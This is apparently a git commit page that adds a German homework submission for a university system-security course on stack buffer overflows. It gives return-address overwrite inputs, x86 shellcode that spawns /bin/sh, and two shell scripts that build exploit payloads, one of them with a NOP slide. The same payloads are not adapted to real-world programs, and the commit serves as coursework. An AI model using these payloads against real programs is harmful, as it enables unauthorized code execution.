[Assignment-6] Task 5 and 6 and flake change
All checks were successful
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (push) Successful in 3m8s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (push) Successful in 48s
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (pull_request) Successful in 19s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (pull_request) Successful in 8s
All checks were successful
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (push) Successful in 3m8s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (push) Successful in 48s
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (pull_request) Successful in 19s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (pull_request) Successful in 8s
In Task 5 ist sind noch vier Byte nicht benutzt, die laut Aufgabenstellung scheinbar vorgesehen sind. Mit padded_password, saved ebp, return address und input komme ich auf 36 Byte, in der vorgegebenen Tabelle ist aber Platz für 40.
This commit is contained in:
parent
8e4f6932e5
commit
0d1dcf5b1e
2 changed files with 177 additions and 0 deletions
176
Assignment 6 - Software Security - Teil 2/abgabe.tex
Normal file
176
Assignment 6 - Software Security - Teil 2/abgabe.tex
Normal file
|
@ -0,0 +1,176 @@
|
|||
\documentclass[11pt]{scrartcl}
|
||||
|
||||
\usepackage[utf8]{inputenc}
|
||||
\usepackage[T1]{fontenc}
|
||||
\usepackage[ngerman]{babel}
|
||||
\usepackage{lmodern}
|
||||
\usepackage{graphicx}
|
||||
\usepackage{listings}
|
||||
\usepackage{xspace}
|
||||
\usepackage{amsmath}
|
||||
\usepackage{algorithm}
|
||||
\usepackage{algpseudocode}
|
||||
\usepackage{xifthen}
|
||||
\usepackage{xcolor}
|
||||
\usepackage{pdfpages}
|
||||
\usepackage[a4paper,lmargin={2cm},rmargin={2cm},tmargin={2.5cm},bmargin = {2.5cm},headheight = {4cm}]{geometry}
|
||||
\usepackage{amsmath,amssymb,amstext,amsthm}
|
||||
\usepackage[shortlabels]{enumitem}
|
||||
\usepackage[headsepline]{scrlayer-scrpage}
|
||||
\pagestyle{scrheadings}
|
||||
\usepackage{titling}
|
||||
\usepackage{etoolbox}
|
||||
\usepackage{tikz}
|
||||
\usepackage{multirow}
|
||||
\usepackage{tabularx}
|
||||
|
||||
\definecolor{keyword}{rgb}{0.0, 0.0, 1.0}
|
||||
\definecolor{comment}{rgb}{0.5, 0.5, 0.5}
|
||||
\definecolor{string}{rgb}{0.6, 0.1, 0.1}
|
||||
\definecolor{background}{rgb}{0.95, 0.95, 0.95}
|
||||
|
||||
\lstset{
|
||||
language=bash,
|
||||
backgroundcolor=\color{background},
|
||||
basicstyle=\ttfamily\small,
|
||||
keywordstyle=\color{keyword}\bfseries,
|
||||
commentstyle=\color{comment}\itshape,
|
||||
stringstyle=\color{string},
|
||||
tabsize=2,
|
||||
showspaces=false,
|
||||
showstringspaces=false,
|
||||
frame=single,
|
||||
numbers=left,
|
||||
numberstyle=\tiny\color{gray},
|
||||
breaklines=true,
|
||||
captionpos=b,
|
||||
escapeinside={(*@}{@*)},
|
||||
}
|
||||
|
||||
\usetikzlibrary{shapes, arrows, calc, automata, arrows.meta, positioning,decorations.pathmorphing,backgrounds,decorations.markings,decorations.pathreplacing, graphs}
|
||||
\usetikzlibrary{matrix,shapes,arrows,positioning,chains, calc}
|
||||
\usetikzlibrary{arrows.meta,matrix,shapes,arrows,positioning,chains, calc}
|
||||
|
||||
\tikzset{%
|
||||
initial text={},
|
||||
state/.style={circle, draw, minimum size=.6cm},
|
||||
every initial by arrow/.style={-stealth},
|
||||
every loop/.append style={-stealth},
|
||||
>=stealth
|
||||
}
|
||||
|
||||
\ohead{\parbox[t]{.5\linewidth}{\raggedleft \theauthor}}
|
||||
\ihead{System Security, SoSe 24, Assignment \thesheetnr}
|
||||
|
||||
% Sheet number
|
||||
\newcounter{sheetnr}
|
||||
\newcommand{\sheetnr}[1]{\setcounter{sheetnr}{#1}}
|
||||
|
||||
% Exercise environments
|
||||
\newenvironment{exercise}[2][]{\section*{#2\expandafter\ifstrempty\expandafter{#1}{}{\ #1}}}{}
|
||||
\newenvironment{subexercises}{\begin{enumerate}[a), font=\bfseries, wide, labelindent=0pt]}{\end{enumerate}}
|
||||
\newenvironment{subsubexercises}{\begin{enumerate}[i), font=\bfseries, wide, labelindent=0pt]}{\end{enumerate}}
|
||||
|
||||
% Makros
|
||||
% MACRO for whole diagram
|
||||
% #1: total width of diagram
|
||||
% #2: total height of diagram
|
||||
% #3: nodes, paths, ...
|
||||
\newcommand\protocolflow[3]{
|
||||
\begin{center}
|
||||
\begin{tikzpicture}[x=#1cm,y=#2cm]
|
||||
#3
|
||||
\end{tikzpicture}
|
||||
\end{center}
|
||||
}
|
||||
% MACRO for path line shortening
|
||||
% #1: start coordinate
|
||||
% #2: target coordinate
|
||||
% #3: text above arrow
|
||||
\newcommand{\package}[3]{
|
||||
\path[*-{latex[width=5pt, length=5pt]}] (#1) edge node [above] {#3} (#2);
|
||||
}
|
||||
|
||||
% Anpassen --> %
|
||||
\author{Benjamin Haschka\\Sascha Tommasone\\Paul Zinselmeyer}
|
||||
\sheetnr{6}
|
||||
% <-- Anpassen %
|
||||
\begin{document}
|
||||
|
||||
\begin{exercise}[Smashing the Stack for Fun and Profit]{5}
|
||||
\begin{subexercises}
|
||||
\item Wenn das Programm mit dem Kommandozeilenargument \lstinline{$(printf "AAAAAAAAAAAAAAAAAAAAAAAA\xBA\xB0\xBA\xB0")} aufgerufen wird, wird der Kontrollfluss wie gewünscht abgeändert.\\
|
||||
\begin{tabular}{ |c|c||c|c|c|c||c|c|c|c| }
|
||||
\hline
|
||||
Vorheriger Speicher & Größe & \multicolumn{4}{|c||}{Vorheriger Speicher} & \multicolumn{4}{|c|}{Vorheriger Speicher}\\
|
||||
\hline
|
||||
&&?&?&?&? & ?&?&?&?\\
|
||||
\hline
|
||||
Parameter password & 4 &BE&BA&FE&CA & 0&BA&FE&CA\\
|
||||
\hline
|
||||
Return Address & 4 & ?&?&?&? & BA&B0&BA&B0\\
|
||||
\hline
|
||||
Previous Frame Address & 4 & ?&?&?&? & 'A'&'A'&'A'&'A'\\
|
||||
\hline
|
||||
&&?&?&?&? & 'A'&'A'&'A'&'A'\\
|
||||
\hline
|
||||
&&?&?&?&? & 'A'&'A'&'A'&'A'\\
|
||||
\hline
|
||||
&&?&?&?&? & 'A'&'A'&'A'&'A'\\
|
||||
\hline
|
||||
&&?&?&?&? & 'A'&'A'&'A'&'A'\\
|
||||
\hline
|
||||
&&'E'&'F'&0&? & 'A'&'A'&'A'&'A'\\
|
||||
\hline
|
||||
Local Variable padded\_password & 24 & 'A'&'B'&'C'&'D' & 'A'&'A'&'A'&'A'\\
|
||||
\hline
|
||||
Freier Speicher & & \multicolumn{4}{|c||}{Freier Speicher} & \multicolumn{4}{|c|}{Freier Speicher}\\
|
||||
\hline
|
||||
\end{tabular}
|
||||
\item Mit dem Kommandozeilenargument \lstinline{$(printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80AAAAAAA\xEF\xBE\xDE\xC0")} wird der Shellcode in \lstinline{padded_password} an Position \lstinline{0xC0DEBEEF} ausgeführt.
|
||||
Sollte sich \lstinline{padded_password} an einer anderen Position im Speicher befinden, funktioniert der Angriff nicht, da der Shellcode gar nicht, oder nur teilweise ausgeführt wird.
|
||||
|
||||
\item \lstinline{strcpy(3p)} berücksichtigt nicht die maximale Länge des Zielspeichers.
|
||||
Die Funktion \lstinline{strncpy(3p} berücksichtigt die maximale Länge des Zielspeichers, indem dessen Länge als Parameter an die Funktion übergeben wird.
|
||||
\lstinline{strncpy(3p} schreibt niemals (inklusive Nullbyte) über den angegebenen Speicherbereich hinaus.
|
||||
Konkret muss in diesem Fall die Zeile 12 \lstinline{strcpy(padded_password, password);} durch \lstinline{strncpy(padded_password, password, 24);} getauscht werden, um die Sicherheitslücke zu schließen.
|
||||
\end{subexercises}
|
||||
\end{exercise}
|
||||
|
||||
\begin{exercise}[Stack-Based Buffer Overflow]{6}
|
||||
\begin{subexercises}
|
||||
\item Mit dem folgenden Script wird eine Eingabe für das Programm generiert, sodass eine Shell ausgeführt wird:\\
|
||||
\begin{lstlisting}[language=Bash]
|
||||
#!/usr/bin/env sh
|
||||
|
||||
# 28 Byte Shellcode
|
||||
SHELLCODE="\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
|
||||
# Padding to fill:
|
||||
# - 72 Bytes to fill buff
|
||||
# - 8 Bytes to fill the local variables before buff
|
||||
# - 4 Bytes to fill the saved ebp value
|
||||
PADDING=$(printf "A%.0s" $(seq 1 84))
|
||||
# Address of the start of the buff array / shellcode
|
||||
RETADDR="\x1C\xDB\xFF\xFF"
|
||||
|
||||
printf $SHELLCODE$PADDING$RETADDR
|
||||
\end{lstlisting}
|
||||
\item Mit dem folgenden Script wird eine Eingabe für das Programm generiert, sodass eine Shell im Anschluss an eine NOP-Slide ausgeführt wird.:\\
|
||||
\begin{lstlisting}[language=Bash]
|
||||
#!/usr/bin/env sh
|
||||
|
||||
# 28 Byte Shellcode
|
||||
SHELLCODE="\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
|
||||
# NOP-Slide to fill:
|
||||
# - 72 Bytes to fill buff
|
||||
# - 8 Bytes to fill the local variables before buff
|
||||
# - 4 Bytes to fill the saved ebp value
|
||||
PADDING=$(printf "\\\\0x90%.0s" $(seq 1 84))
|
||||
# Address of the start of the buff array / shellcode
|
||||
RETADDR="\x1C\xDB\xFF\xFF"
|
||||
|
||||
printf $PADDING$SHELLCODE$RETADDR
|
||||
\end{lstlisting}
|
||||
\end{subexercises}
|
||||
\end{exercise}
|
||||
\end{document}
|
|
@ -7,6 +7,7 @@
|
|||
assignments = [
|
||||
"Assignment 4 - Protokollsicherheit (Praxis)"
|
||||
"Assignment 5 - Software Security - Teil 1"
|
||||
"Assignment 6 - Software Security - Teil 2"
|
||||
];
|
||||
|
||||
forAllSystems = function:
|
||||
|
|
Loading…
Reference in a new issue